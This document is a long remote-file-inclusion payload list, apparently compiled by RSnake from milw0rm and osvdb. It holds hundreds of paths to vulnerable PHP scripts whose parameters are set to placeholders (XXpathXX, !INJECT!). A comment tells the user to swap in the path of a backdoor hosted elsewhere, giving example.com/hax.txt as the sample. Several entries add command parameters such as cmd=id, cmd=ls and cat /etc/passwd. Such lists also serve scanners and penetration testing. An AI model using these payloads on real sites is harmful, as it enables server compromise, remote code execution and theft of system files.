/top.php?laypath=XXpathXX
|
||||
/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
|
||||
/topsites/index.php?page=XXpathXX?&
|
||||
/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
|
||||
/track.php?path=XXpathXX
|
||||
/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
|
||||
/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
|
||||
/twebs/modules/misc/usermods.php?ROOT=XXpathXX
|
||||
/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
|
||||
/unavailable.php?bibtexrootrel=XXpathXX?
|
||||
/unsubs.php?scdir=XXpathXX
|
||||
/up.php?my[root]=XXpathXX
|
||||
/upload.php?save_path=XXpathXX?
|
||||
/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
|
||||
/upload/top.php?maindir=XXpathXX?
|
||||
/upload/xax/admin/modules/install_module.php?level=XXpathXX?
|
||||
/upload/xax/admin/patch/index.php?level=XXpathXX?
|
||||
/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
|
||||
/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
|
||||
/upload_local.php?target=XXpathXX?
|
||||
/upload_multi.php?target=XXpathXX?
|
||||
/urlinn_includes/config.php?dir_ws=XXpathXX?
|
||||
/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
|
||||
/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
|
||||
/user_new_2.php?home=XXpathXX
|
||||
/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
|
||||
/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
|
||||
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
|
||||
/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
|
||||
/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
|
||||
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
|
||||
/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
|
||||
/vb/includes/functions.php?classfile=XXpathXX
|
||||
/vb/includes/functions_cron.php?nextitem=XXpathXX
|
||||
/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
|
||||
/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
|
||||
/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
|
||||
/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
|
||||
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
|
||||
/view.php?ariadne=XXpathXX?
|
||||
/view.php?id=XXpathXX
|
||||
/view_func.php?i=XXpathXX&l=testfile.txt?
|
||||
/views/print/printbar.php?views_path=XXpathXX
|
||||
/visible_count_inc.php?statitpath=XXpathXX
|
||||
/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
|
||||
/volume.php?config[public_dir]=XXpathXX?
|
||||
/vote.php?Madoa=XXpathXX?
|
||||
/votebox.php?VoteBoxPath=XXpathXX
|
||||
/vp/configure.php?phpbb_root_path=XXpathXX?
|
||||
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
|
||||
/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
|
||||
/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
|
||||
/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
|
||||
/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
|
||||
/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
|
||||
/war.php?vwar_root=XXpathXX
|
||||
/warn.php?file=XXpathXX
|
||||
/watermark.php?GALLERY_BASEDIR=XXpathXX
|
||||
/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
|
||||
/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
|
||||
/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
|
||||
/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
|
||||
/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
|
||||
/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
|
||||
/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
|
||||
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
|
||||
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
|
||||
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
|
||||
/web/Flickrclient.php?path_prefix=XXpathXX
|
||||
/web/help.php?LIBSDIR=XXpathXX
|
||||
/web/includes/blogger.php?path_prefix=XXpathXX
|
||||
/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
|
||||
/web/includes/functions/html_generate.php?path_prefix=XXpathXX
|
||||
/web/includes/functions/validations.php?path_prefix=XXpathXX
|
||||
/web/index.php?LIBSDIR=XXpathXX
|
||||
/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
|
||||
/web/login.php?LIBSDIR=XXpathXX
|
||||
/web/logout.php?LIBSDIR=XXpathXX
|
||||
/web/lom.php?ETCDIR=XXpathXX
|
||||
/web/network_module_selector.php?path_prefix=XXpathXX
|
||||
/web/submit_abuse.php?path_prefix=XXpathXX
|
||||
/web/submit_comment.php?path_prefix=XXpathXX
|
||||
/webavis/class/class.php?root=XXpathXX?
|
||||
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
|
||||
/webnews/template.php?content_page=XXpathXX?
|
||||
/webroot/css.php?CONFIGS=XXpathXX
|
||||
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
|
||||
/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
|
||||
/window.php?action=XXpathXX
|
||||
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
|
||||
/work/index.php?g_include=XXpathXX
|
||||
/work/module/forum/forum.php?g_include=XXpathXX
|
||||
/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
|
||||
/wp-cache-phase1.php?plugin=XXpathXX
|
||||
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
|
||||
/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
|
||||
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
|
||||
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
|
||||
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
|
||||
/wsk/wsk.php?wsk=XXpathXX
|
||||
/xarg_corner.php?xarg=XXpathXX?
|
||||
/xarg_corner_bottom.php?xarg=XXpathXX?
|
||||
/xarg_corner_top.php?xarg=XXpathXX?
|
||||
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
|
||||
/xt_counter.php?server_base_dir=XXpathXX
|
||||
/yabbse/Sources/Packages.php?sourcedir=XXpathXX
|
||||
/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
|
||||
/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
|
||||
/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
|
||||
/zipndownload.php?PP_PATH=XXpathXX?
|
||||
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
|
||||
# Compiled by @RSnake (2010-01-02).
|
||||
# Mostly from milw0rm, osvdb.org and elsewhere.
|
||||
# Change !INJECT! to the path of your backdoor.
|
||||
# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
|
||||
# E.g.: !INJECT! => http://www.example.com/hax.txt?
|
||||
|
||||
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
|
||||
/123flashchat.php?e107path=!INJECT!
|
||||
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
|
||||
/22_ultimate/templates/header.php?mainpath=!INJECT!
|
||||
/22_ultimate/templates/header.php?mainpath=!INJECT!?
|
||||
/=!INJECT!
|
||||
/?_CONFIG[files][functions_page]=!INJECT!
|
||||
/?npage=-1&content_dir=!INJECT!%00&cmd=ls
|
||||
/?npage=1&content_dir=!INJECT!%00&cmd=ls
|
||||
/?show=!INJECT!?
|
||||
/A-Blog/navigation/donation.php?navigation_start=!INJECT!
|
||||
/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
|
||||
/A-Blog/navigation/links.php?navigation_start=!INJECT!?
|
||||
/A-Blog/navigation/search.php?navigation_end=!INJECT!?
|
||||
/A-Blog/sources/myaccount.php?open_box=!INJECT!?
|
||||
/ACGVnews/header.php?PathNews=!INJECT!
|
||||
/ATutor/documentation/common/frame_toc.php?section=!INJECT!
|
||||
/ATutor/documentation/common/search.php?section=!INJECT!
|
||||
/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
|
||||
/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
|
||||
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
|
||||
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
|
||||
/Administration/Includes/configureText.php?path_prefix=!INJECT!
|
||||
/Administration/Includes/contentHome.php?path_prefix=!INJECT!
|
||||
/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
|
||||
/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
|
||||
/Administration/Includes/userHome.php?path_prefix=!INJECT!
|
||||
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
|
||||
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
|
||||
/BE_config.php?_PSL[classdir]=!INJECT!
|
||||
/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
|
||||
/Base/Application.php?pear_dir=!INJECT!
|
||||
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
|
||||
/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
|
||||
/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
|
||||
/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
|
||||
/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
|
||||
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
|
||||
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
|
||||
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
|
||||
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
|
||||
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
|
||||
/CheckUpload.php?Language=!INJECT!&cmd=ls
|
||||
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
|
||||
/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
|
||||
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
|
||||
/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
|
||||
/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
|
||||
/DynaTracker_v151/action.php?base_path=!INJECT!
|
||||
/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
|
||||
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
|
||||
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
|
||||
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
|
||||
/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
|
||||
/FirstPost/block.php?Include=!INJECT!
|
||||
/Flickrclient.php?path_prefix=!INJECT!
|
||||
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
|
||||
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
|
||||
/Full_Release/include/body_comm.inc.php?content=!INJECT!
|
||||
/Gallery/displayCategory.php?basepath=!INJECT!
|
||||
/Include/lib.inc.php3?Include=!INJECT!?
|
||||
/Include/variables.php3?Include=!INJECT!?
|
||||
/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
|
||||
/ListRecords.php?lib_dir=!INJECT!?&cmd=id
|
||||
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
|
||||
/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
|
||||
/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
|
||||
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
|
||||
/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
|
||||
/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
|
||||
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
|
||||
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
|
||||
/PHP/includes/header.inc.php?root=!INJECT!?
|
||||
/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
|
||||
/PaTh/index.php?rootpath=!INJECT!
|
||||
/Path_Script/createurl.php?formurl=!INJECT!
|
||||
/PhotoCart/adminprint.php?admin_folder=!INJECT!
|
||||
/Picssolution/install/config.php?path=!INJECT!?
|
||||
/RGboard/include/footer.php?_path[counter]=!INJECT!?
|
||||
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
|
||||
/SQuery/lib/gore.php?libpath=!INJECT!
|
||||
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
|
||||
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
|
||||
/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
|
||||
/ScriptPath/footers.php?tinybb_footers=!INJECT!
|
||||
/ScriptPath/index.php?page=!INJECT!
|
||||
/Script_Path/config.inc.php?_path=!INJECT!?
|
||||
/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
|
||||
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
|
||||
/Somery/team.php?checkauth=!INJECT!
|
||||
/Upload/install.php?skindir=!INJECT!
|
||||
/Widgets/Base/Footer.php?sys_dir=!INJECT!
|
||||
/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
|
||||
/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
|
||||
/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
|
||||
